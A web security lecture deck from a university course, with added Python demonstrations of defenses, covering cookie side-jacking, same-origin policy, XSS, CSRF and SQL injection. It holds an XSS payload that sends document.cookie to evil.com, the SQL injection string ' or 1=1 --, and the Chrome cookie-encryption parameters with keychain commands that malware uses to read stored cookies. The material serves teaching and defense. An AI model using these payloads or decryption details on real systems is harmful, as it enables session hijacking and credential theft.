CS 5430 5/2/2018
Lecture 26: Web Security
2015 Security Incidents
Vulnerabilities by Year
Vulnerability Occurrence in Applications (chart by year: 2013, 2014, 2015)
HTTP Basics

Request:
    GET /index.html HTTP/1.1
    Host: www.example.com

Response:
    HTTP/1.1 200 OK
    Date: Fri, 17 March 2017 10:10:00 EDT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 138
    Connection: close

    <html><head><title>An Example Page</title>
    </head><body>Hello World!
    </body></html>
Session Management (diagram: browser and server exchange HTTP GET / HTTP OK, then a second HTTP GET / HTTP OK)
Cookie Side-jacking (diagram)
    SSL(login)
    SSL(redirect; set-cookie)
    Request; cookie=SID        (the later request is sent over plain HTTP, so the cookie is visible on the network)
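An added example in Python (not from the lecture slides) that models the exchange above: the session cookie is set during the SSL login/redirect, and the browser then attaches it to later plain-HTTP requests, where anyone on the same network can read it. The server-side fix the model shows, the Secure cookie attribute, is not named on this slide; the Set-Cookie values and URLs are constructed.

```python
from urllib.parse import urlsplit


def parse_set_cookie(header_value: str) -> dict:
    """Split the value of a Set-Cookie header into name, value and attributes.
    Flag attributes (Secure, HttpOnly) map to True; valued ones keep their value."""
    parts = [p.strip() for p in header_value.split(";") if p.strip()]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for attr in parts[1:]:
        key, _, val = attr.partition("=")
        attrs[key.strip().lower()] = val.strip() if val else True
    return {"name": name.strip(), "value": value.strip(), "attrs": attrs}


def browser_attaches(cookie: dict, request_url: str) -> bool:
    """Model the browser's decision: a Secure cookie only travels over https;
    any other cookie is also sent in the clear, which side-jacking relies on."""
    scheme = urlsplit(request_url).scheme.lower()
    if cookie["attrs"].get("secure") and scheme != "https":
        return False
    return True


def sidejack_exposure(set_cookie_value: str, later_requests: list) -> list:
    """Return the plain-http URLs on which the session cookie would be visible
    to an eavesdropper on the same network."""
    cookie = parse_set_cookie(set_cookie_value)
    return [url for url in later_requests
            if urlsplit(url).scheme == "http" and browser_attaches(cookie, url)]


# Constructed values mirroring the slide: SSL login, SSL redirect carrying
# Set-Cookie, then ordinary page loads, some of them over plain http.
WEAK_SET_COOKIE = "SID=31d4d96e407aad42; Path=/"
HARDENED_SET_COOKIE = "SID=31d4d96e407aad42; Path=/; Secure; HttpOnly"
LATER_REQUESTS = [
    "https://www.example.com/home",
    "http://www.example.com/feed",          # the SID leaks here
    "http://www.example.com/img/logo.png",  # and here
]

if __name__ == "__main__":
    print("weak    :", sidejack_exposure(WEAK_SET_COOKIE, LATER_REQUESTS))
    print("hardened:", sidejack_exposure(HARDENED_SET_COOKIE, LATER_REQUESTS))
```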
FireSheep (October 2010)
SSL by Default (top 10k)
Cookie Forgery (diagram)
    SSL(login)
    SSL(redirect; set-cookie)
    Request; cookie=SSID
Cookie Forgery
Cookie Theft
• Malware sometimes targets local browser state
Chrome Encrypted Cookies
• salt is 'saltysalt'
• key length is 16
• iv is 16 bytes of space: b' ' * 16
• on Mac OS X:
  • password is in keychain: security find-generic-password -w -s "Chrome Safe Storage"
  • 1003 iterations
• on Chrome OS:
  • password is in keychain: security find-generic-password -wga Chrome
  • 1003 iterations
• on Linux:
  • password is peanuts
  • 1 iteration
• on Windows:
  • password is current user password
  • CryptProtectData uses 4000 iterations
Vulnerability Occurrence in Applications (chart by year: 2013, 2014, 2015)
HTML

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="content-type" content="text/html; charset=utf-8" /><title>CS 5430 Spring 2018: System Security</title><link rel="stylesheet" href="style.css" /><link rel="shortcut icon" href="http://www.cornell.edu/favicon.ico" />
</head><body>
<div id="canvas"><div id="header">
<div id="info"><a href="http://www.cs.cornell.edu/courses/cs5430/2018sp"> <span class="title">CS 5430</span><br />
<span class="subtitle">System Security</span></a></div><div id="logo">
<a href="http://www.cs.cornell.edu"><img src="cslogo.png" alt="Cornell Computer Science" /></a></div>
</div><!--end header--><div style="clear:both;"></div><div id="menu">
<ul> <li><a href="index.html">Home</a></li> <li><a href="syllabus.html">Syllabus</a></li> <li><a href="schedule.html">Schedule</a></li> <li><a href="project.html">Project</a></li>
</ul></div>
Document Object Model (DOM)
Same Origin Policy (SOP)
Data for http://www.example.com/dir/page.html accessed by:
• http://www.example.com/dir/page2.html
• http://www.example.com/dir2/page3.html
• https://www.example.com/dir/page.html
• http://www.example.com:81/dir/page.html
• http://www.example.com:80/dir/page.html
• http://evil.com/dir/page.html
• http://example.com/dir/page.html
SOP Exceptions
• Domain relaxation: document.domain
• Cross-origin network requests: Access-Control-Allow-Origin
• Cross-origin client-side communication: postMessage
• Importing scripts
Cross-Site Scripting (XSS)
• Form of code injection
• evil.com sends victim a script that runs on example.com
Reflected XSS (diagram: Attack Server and Victim Server, with numbered steps of the attack flow)
Reflected XSS
• Search field on victim.com:
  • http://victim.com/search.php?term=apple
• Server-side implementation of search.php:
    <html>
    <title> Search Results </title>
    <body> Results for <?php echo $_GET['term'] ?>: ...</body>
    </html>
• What if victim instead clicks on:
    http://victim.com/search.php?term=<script> window.open("http://evil.com?cookie = " + document.cookie ) </script>
Reflected XSS (diagram: Attack Server www.evil.com, Victim Server www.victim.com)
    Link served by the attack server:
        http://victim.com/search.php?term=<script> ... </script>
    Page reflected by the victim server:
        <html> Results for <script> window.open(http://attacker.com? ... document.cookie ...) </script> </html>
Stored XSS (diagram: Attack Server, Server Victim, User Victim; step 1: inject malicious script)
Stored XSS attack vectors
• loaded images
• HTML attributes
• user content (comments, blog posts)
Example XSS attacks
XSS Defenses
• Parameter Validation
• HTTP-Only Cookies
• Dynamic Data Tainting
• Static Analysis
• Script Sandboxing
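An added example in Python (not from the lecture slides) serving the Reflected XSS search.php slides and the defense list above: it re-implements search.php twice, once echoing the term raw as the slide's PHP does and once HTML-escaping it on output, and feeds both the slide's malicious link to show that escaping turns the script tag into inert text. It also emits the session cookie with HttpOnly, so document.cookie cannot read it even when an injection does succeed. URL and cookie values are constructed.

```python
import html
from urllib.parse import parse_qs, quote, urlsplit

# Constructed: the benign link from the slide and the slide's malicious term,
# percent-encoded the way a browser would send it.
BENIGN_URL = "http://victim.com/search.php?term=apple"
PAYLOAD = '<script> window.open("http://evil.com?cookie = " + document.cookie ) </script>'
ATTACK_URL = "http://victim.com/search.php?term=" + quote(PAYLOAD)


def term_from_url(url: str) -> str:
    """Read the 'term' query parameter the way search.php reads $_GET['term']."""
    return parse_qs(urlsplit(url).query).get("term", [""])[0]


def render_vulnerable(term: str) -> str:
    """The slide's search.php: the term is pasted into the HTML unchanged."""
    return ("<html><title> Search Results </title><body>Results for "
            + term + ": ...</body></html>")


def render_escaped(term: str) -> str:
    """Same page, but the term is HTML-escaped on output: < > & \" ' become
    entities, so the browser displays the text instead of parsing a tag."""
    return ("<html><title> Search Results </title><body>Results for "
            + html.escape(term, quote=True) + ": ...</body></html>")


def has_script_element(page: str) -> bool:
    """Crude check, used here only to show whether an injected tag survived."""
    return "<script" in page.lower()


def session_set_cookie(sid: str) -> str:
    """HttpOnly keeps the SID out of document.cookie, so a payload like the
    slide's cannot exfiltrate it; Secure keeps it off plain-http requests."""
    return f"SID={sid}; Path=/; Secure; HttpOnly"


if __name__ == "__main__":
    term = term_from_url(ATTACK_URL)
    print("vulnerable page contains script:", has_script_element(render_vulnerable(term)))
    print("escaped page contains script:   ", has_script_element(render_escaped(term)))
```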
Vulnerability Occurrence in Applications (chart by year: 2013, 2014, 2015)
Cross-Site Request Forgery (CSRF) (diagram: Attack Server, Server Victim, User Victim, with numbered steps of the attack flow)
CSRF Defenses
• Secret Validation Token:
    <input type=hidden value=23a3af01b>
• Referrer Validation:
    Referer: http://www.facebook.com/home.php
• Custom HTTP Header:
    X-Requested-By: XMLHttpRequest
• User Interaction (e.g., CAPTCHA)
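An added example in Python (not from the lecture slides): the three server-side checks from the list above applied to one state-changing request. The secret validation token is bound to the session with an HMAC over a server-side key (constructed here), the referrer check compares the Referer header's origin with the site on the slide, and the custom-header check looks for X-Requested-By. Session ids and header values are constructed.

```python
import hashlib
import hmac
import secrets
from urllib.parse import urlsplit

SERVER_SECRET = secrets.token_bytes(32)   # constructed; one per deployment, never sent to clients
SITE_ORIGIN = "http://www.facebook.com"   # origin of the slide's Referer example


def issue_token(session_id: str) -> str:
    """Secret validation token: HMAC(secret, session id), sent to the browser as
    <input type=hidden name=csrf value=...>. A forged cross-site form cannot
    include it because the attacker's page can never read ours (SOP)."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def token_ok(session_id: str, submitted: str) -> bool:
    """Constant-time comparison; also fails for a token minted for another session."""
    return hmac.compare_digest(issue_token(session_id), submitted)


def referer_ok(headers: dict) -> bool:
    """Referrer validation: the request must come from a page on our own origin.
    Strict variant: a missing Referer header is rejected."""
    ref = headers.get("Referer")
    if not ref:
        return False
    p = urlsplit(ref)
    return f"{p.scheme}://{p.netloc}".lower() == SITE_ORIGIN


def custom_header_ok(headers: dict) -> bool:
    """Custom HTTP header: a plain HTML form posted from another site cannot set
    it; only script running on our origin (XMLHttpRequest) can."""
    return headers.get("X-Requested-By") == "XMLHttpRequest"


def accept_state_change(session_id: str, form: dict, headers: dict) -> bool:
    """Defense in depth: the token must match the session, and at least one of
    the two header-based checks must pass as well."""
    if not token_ok(session_id, form.get("csrf", "")):
        return False
    return referer_ok(headers) or custom_header_ok(headers)


if __name__ == "__main__":
    sid = "sess-42"
    good = {"csrf": issue_token(sid)}
    print("legitimate form post:", accept_state_change(sid, good, {"Referer": SITE_ORIGIN + "/home.php"}))
    print("forged cross-site post:", accept_state_change(sid, {}, {"Referer": "http://evil.com/page.html"}))
```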
Vulnerability Occurrence in Applications (chart by year: 2013, 2014, 2015)
SQL Injection
• SQL Injection is another example of code injection
• Adversary exploits user-controlled input to change the meaning of a database command
SQL Injection (diagram: Web Browser (Client) -> Web Server -> DB)
    User enters username & password; the web server issues:
        SELECT * FROM Users WHERE user='me' AND pwd='1234'
SQL Injection (diagram: Web Browser (Client) -> Web Server -> DB)
    User enters username & password; the web server issues:
        SELECT * FROM Users WHERE user='me' AND pwd='1234'
    What if user = " ' or 1=1 -- "?
SQL Injection
SQLi in the Wild
Defenses Against SQL Injection
• Prepared Statements:
    String custname = request.getParameter("customerName");
    // perform input validation to detect attacks
    String query = "SELECT account_balance FROM user_data WHERE user_name = ? ";
    PreparedStatement pstmt = connection.prepareStatement( query );
    pstmt.setString( 1, custname);
    ResultSet results = pstmt.executeQuery( );
• Input Validation:
  • Case statements, cast to non-string type
• Escape user-supplied inputs:
  • Not recommended
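An added example in Python using the standard-library sqlite3 module (not from the lecture slides): the login query from the SQL Injection slides built by string concatenation beside its prepared-statement form, each run with the honest credentials and with the "' or 1=1 --" username the slide asks about, plus the cast-to-integer validation from the list above. The Users table is constructed in memory.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed in-memory Users table standing in for the slide's DB."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (user TEXT, pwd TEXT)")
    conn.execute("INSERT INTO Users VALUES ('me', '1234'), ('admin', 's3cret')")
    return conn


def login_vulnerable(conn: sqlite3.Connection, user: str, pwd: str) -> bool:
    """The slide's query with both inputs pasted straight into the SQL text.
    A quote in the username ends the literal early and the rest is parsed
    as SQL; '--' comments out the password check entirely."""
    sql = f"SELECT * FROM Users WHERE user='{user}' AND pwd='{pwd}'"
    return conn.execute(sql).fetchone() is not None


def login_prepared(conn: sqlite3.Connection, user: str, pwd: str) -> bool:
    """Prepared statement: '?' placeholders keep the inputs as data values,
    so the username is compared literally, quotes and all."""
    sql = "SELECT * FROM Users WHERE user=? AND pwd=?"
    return conn.execute(sql, (user, pwd)).fetchone() is not None


def validated_account_id(raw: str) -> int:
    """Input validation from the defenses slide: cast to a non-string type, so
    anything that is not a plain positive integer never reaches the query."""
    if not raw.isdigit():
        raise ValueError("account id must be a positive integer")
    return int(raw)


PAYLOAD = "' or 1=1 -- "   # the slide's "What if user = ..." input


def demo() -> dict:
    """Run both query styles with honest input and with the slide's payload."""
    conn = make_db()
    return {
        "honest_vuln": login_vulnerable(conn, "me", "1234"),
        "honest_prep": login_prepared(conn, "me", "1234"),
        "payload_vuln": login_vulnerable(conn, PAYLOAD, "wrong"),
        "payload_prep": login_prepared(conn, PAYLOAD, "wrong"),
    }


if __name__ == "__main__":
    for case, logged_in in demo().items():
        print(f"{case:13s} logged in: {logged_in}")
```

With the payload, the concatenated query reads `... WHERE user='' or 1=1 -- ' AND pwd='wrong'`, which matches every row; the prepared form returns no row.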
Vulnerability Occurrence in Applications (chart by year: 2013, 2014, 2015)